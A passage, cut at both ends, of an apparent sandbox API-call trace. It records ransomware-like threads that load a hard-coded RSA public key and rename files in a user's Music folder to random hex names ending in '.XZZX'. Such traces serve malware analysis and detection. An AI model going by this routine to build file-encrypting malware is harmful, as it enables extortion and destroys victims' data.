dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0187.519] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\CF8665052FC9448E66D74049327428D6.XZZX") returned 110 [0187.519] StrStrW (lpFirst="64527B001382D7BF4D0A170017B7BC07.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 694 os_tid = 0xcdc [0187.675] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0187.675] lstrcpyW (in: lpString1=0x2aaf460, lpString2="663067DE2A526ACA340DE0352E734F12.XZZX" | out: lpString1="663067DE2A526ACA340DE0352E734F12.XZZX") returned="663067DE2A526ACA340DE0352E734F12.XZZX" [0187.675] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.675] SetErrorMode (uMode=0x1) returned 0x1 [0187.675] lstrcpyW (in: lpString1=0x2aaf860, lpString2="663067DE2A526ACA340DE0352E734F12.XZZX" | out: lpString1="663067DE2A526ACA340DE0352E734F12.XZZX") returned="663067DE2A526ACA340DE0352E734F12.XZZX" [0187.675] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x715bda84, Data2=0x730f, Data3=0x4fe6, Data4=([0]=0x82, [1]=0x14, [2]=0xb7, [3]=0x91, [4]=0x4d, [5]=0xdb, [6]=0xf4, [7]=0xd2))) returned 0x0 [0187.675] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\663067DE2A526ACA340DE0352E734F12.XZZX") returned 110 [0187.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0187.675] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\E78B19BC23E9007A715BDA842693E4C2.XZZX") returned 110 [0187.675] StrStrW (lpFirst="663067DE2A526ACA340DE0352E734F12.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 695 os_tid = 0xce0 [0187.831] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0187.831] lstrcpyW (in: lpString1=0x2aaf460, lpString2="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX" | out: lpString1="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX") returned="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX" [0187.831] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.831] SetErrorMode (uMode=0x1) returned 0x1 [0187.831] lstrcpyW (in: lpString1=0x2aaf860, lpString2="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX" | out: lpString1="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX") returned="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX" [0187.831] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x49cd7ff4, Data2=0xf3df, Data3=0x44be, Data4=([0]=0xa4, [1]=0x4f, [2]=0x9b, [3]=0xa8, [4]=0xa7, [5]=0x7f, [6]=0x8e, [7]=0x3b))) returned 0x0 [0187.831] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX") returned 110 [0187.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0187.831] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\5A77118C417C3B8249CD7FF444271FCA.XZZX") returned 110 [0187.831] StrStrW (lpFirst="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 696 os_tid = 0xce4 [0187.987] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0187.987] lstrcpyW (in: lpString1=0x2aaf460, lpString2="83899D5A26F059DE25E7413F2B253E26.XZZX" | out: lpString1="83899D5A26F059DE25E7413F2B253E26.XZZX") returned="83899D5A26F059DE25E7413F2B253E26.XZZX" [0187.987] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.987] SetErrorMode (uMode=0x1) returned 0x1 [0187.987] lstrcpyW (in: lpString1=0x2aaf860, lpString2="83899D5A26F059DE25E7413F2B253E26.XZZX" | out: lpString1="83899D5A26F059DE25E7413F2B253E26.XZZX") returned="83899D5A26F059DE25E7413F2B253E26.XZZX" [0187.987] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x7fab884, Data2=0xf313, Data3=0x42ec, Data4=([0]=0xa2, [1]=0xb6, [2]=0xe7, [3]=0xd, [4]=0xef, [5]=0x28, [6]=0xcc, [7]=0xb5))) returned 0x0 [0187.987] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\83899D5A26F059DE25E7413F2B253E26.XZZX") returned 110 [0187.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0187.987] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\94C0FDCC3F8AFB8407FAB8844235DFCC.XZZX") returned 110 [0187.987] StrStrW (lpFirst="83899D5A26F059DE25E7413F2B253E26.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 697 os_tid = 0xce8 [0188.143] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0188.143] lstrcpyW (in: lpString1=0x2aaf460, lpString2="B7D698FE122EFCA3A766339E164FE0EB.XZZX" | out: lpString1="B7D698FE122EFCA3A766339E164FE0EB.XZZX") returned="B7D698FE122EFCA3A766339E164FE0EB.XZZX" [0188.143] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0188.143] SetErrorMode (uMode=0x1) returned 0x1 [0188.143] lstrcpyW (in: lpString1=0x2aaf860, lpString2="B7D698FE122EFCA3A766339E164FE0EB.XZZX" | out: lpString1="B7D698FE122EFCA3A766339E164FE0EB.XZZX") returned="B7D698FE122EFCA3A766339E164FE0EB.XZZX" [0188.143] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x78a414db, Data2=0x6bfb, Data3=0x435a, Data4=([0]=0x9f, [1]=0x28, [2]=0xd, [3]=0xb0, [4]=0x4b, [5]=0xd6, [6]=0x2f, [7]=0x97))) returned 0x0 [0188.143] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\B7D698FE122EFCA3A766339E164FE0EB.XZZX") returned 110 [0188.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0188.143] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DD97FBB91C68A73E78A414DB1F138B86.XZZX") returned 110 [0188.143] StrStrW (lpFirst="B7D698FE122EFCA3A766339E164FE0EB.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 698 os_tid = 0xd3c [0188.413] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0188.413] lstrcpyW (in: lpString1=0x2aaf460, lpString2="B7FE604F2A0F001FC8BF560F2E43E467.XZZX" | out: lpString1="B7FE604F2A0F001FC8BF560F2E43E467.XZZX") returned="B7FE604F2A0F001FC8BF560F2E43E467.XZZX" [0188.413] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0188.413] SetErrorMode (uMode=0x1) returned 0x1 [0188.413] lstrcpyW (in: lpString1=0x2aaf860, lpString2="B7FE604F2A0F001FC8BF560F2E43E467.XZZX" | out: lpString1="B7FE604F2A0F001FC8BF560F2E43E467.XZZX") returned="B7FE604F2A0F001FC8BF560F2E43E467.XZZX" [0188.413] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x9a0fcf7, Data2=0x5878, Data3=0x40d5, Data4=([0]=0xbd, [1]=0xdc, [2]=0x12, [3]=0x84, [4]=0xe4, [5]=0xa4, [6]=0xe3, [7]=0xca))) returned 0x0 [0188.413] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\B7FE604F2A0F001FC8BF560F2E43E467.XZZX") returned 110 [0188.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0188.413] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DA6B7BC816679BD809A0FCF719128020.XZZX") returned 110 [0188.413] StrStrW (lpFirst="B7FE604F2A0F001FC8BF560F2E43E467.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 699 os_tid = 0xd4c [0188.533] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0188.533] lstrcpyW (in: lpString1=0x2aaf460, lpString2="BA853E823C01028A03C2DABB4021E6D2.XZZX" | out: lpString1="BA853E823C01028A03C2DABB4021E6D2.XZZX") returned="BA853E823C01028A03C2DABB4021E6D2.XZZX" [0188.533] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0188.533] SetErrorMode (uMode=0x1) returned 0x1 [0188.533] lstrcpyW (in: lpString1=0x2aaf860, lpString2="BA853E823C01028A03C2DABB4021E6D2.XZZX" | out: lpString1="BA853E823C01028A03C2DABB4021E6D2.XZZX") returned="BA853E823C01028A03C2DABB4021E6D2.XZZX" [0188.533] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x5e3be1af, Data2=0x2163, Data3=0x43ae, Data4=([0]=0xa3, [1]=0xf4, [2]=0x15, [3]=0x62, [4]=0xf1, [5]=0xec, [6]=0x81, [7]=0xeb))) returned 0x0 [0188.533] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\BA853E823C01028A03C2DABB4021E6D2.XZZX") returned 110 [0188.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0188.533] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\293FD5AD08D39A4A5E3BE1AF0B7E7E92.XZZX") returned 110 [0188.533] StrStrW (lpFirst="BA853E823C01028A03C2DABB4021E6D2.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 700 os_tid = 0xd50 [0188.689] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0188.689] lstrcpyW (in: lpString1=0x2aaf460, lpString2="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX" | out: lpString1="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX") returned="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX" [0188.689] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0188.689] SetErrorMode (uMode=0x1) returned 0x1 [0188.689] lstrcpyW (in: lpString1=0x2aaf860, lpString2="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX" | out: lpString1="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX") returned="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX" [0188.689] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x6b52e936, Data2=0x110, Data3=0x480e, Data4=([0]=0x96, [1]=0xa4, [2]=0xd, [3]=0x53, [4]=0xcc, [5]=0x5, [6]=0x50, [7]=0x1a))) returned 0x0 [0188.689] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX") returned 110 [0188.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0188.689] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\0817C960004C8EE06B52E93602F77328.XZZX") returned 110 [0188.689] StrStrW (lpFirst="C3E4F2C10C4D8EEA8EBC635B106E7332.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 701 os_tid = 0xd54 [0188.845] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0188.845] lstrcpyW (in: lpString1=0x2aaf460, lpString2="D02310330D7F24F9EA0895E311A00941.XZZX" | out: 